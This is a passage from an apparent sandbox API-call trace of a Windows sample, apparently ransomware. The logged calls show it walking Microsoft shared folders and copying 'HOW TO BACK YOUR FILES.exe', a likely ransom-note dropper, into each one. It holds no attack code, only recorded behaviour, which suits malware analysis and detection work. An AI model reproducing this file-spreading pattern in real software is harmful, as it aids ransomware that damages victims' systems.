lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wksconv\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.896] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.896] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6e32460, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x536ae9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536ae9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.896] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.896] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.896] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US" [0056.896] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0056.896] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0056.896] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US") returned 67 [0056.896] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US" [0056.896] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.896] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.901] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.901] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x536ae9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536ae9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.901] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.901] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.901] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery" [0056.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0056.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0056.901] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery") returned 63 [0056.901] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery" [0056.901] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.902] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.908] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.908] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x536d4b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536d4b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.908] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.908] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.908] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal" [0056.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1888 | out: hHeap=0x2b0000) returned 1 [0056.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0056.909] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal") returned 59 [0056.909] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal" [0056.909] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.909] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.914] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.914] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeefe5e10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x536d4b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536d4b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.914] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.914] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.914] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033" [0056.914] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0056.914] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0056.914] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033") returned 64 [0056.914] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033" [0056.914] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.914] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.919] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.919] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeefe5e10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x536d4b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536d4b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.920] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.920] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.920] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14" [0056.920] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0056.920] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0056.920] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14") returned 61 [0056.920] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14" [0056.920] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.920] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.924] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.924] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7a735b0, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x536faca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536faca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.925] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.925] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.925] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller" [0056.925] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0056.925] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0056.925] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller") returned 85 [0056.925] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller" [0056.925] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.925] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\office setup controller\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.930] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.930] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7ae59d0, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x536faca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536faca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.930] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.930] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.930] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures" [0056.930] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0056.930] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0056.930] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures") returned 70 [0056.930] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures" [0056.930] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.930] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\cultures\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.935] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.935] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad3651a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x536faca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536faca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.936] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.936] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.936] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033" [0056.936] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0056.936] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0056.936] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033") returned 66 [0056.936] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033" [0056.936] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.936] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.943] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.943] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b36970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53720e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53720e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.944] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.944] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.944] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo" [0056.944] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1808 | out: hHeap=0x2b0000) returned 1 [0056.944] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0056.944] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo") returned 59 [0056.944] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo" [0056.944] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.944] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.949] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.949] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53720e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53720e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.949] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.949] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.949] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US" [0056.949] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0056.949] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0056.949] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US") returned 65 [0056.949] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US" [0056.949] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.949] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.954] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.954] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x53746f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53746f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.954] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.954] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.954] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv" [0056.954] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1788 | out: hHeap=0x2b0000) returned 1 [0056.954] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0056.954] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv") returned 58 [0056.954] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv" [0056.954] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.955] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.962] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.962] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53746f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53746f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.962] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.962] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.962] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files 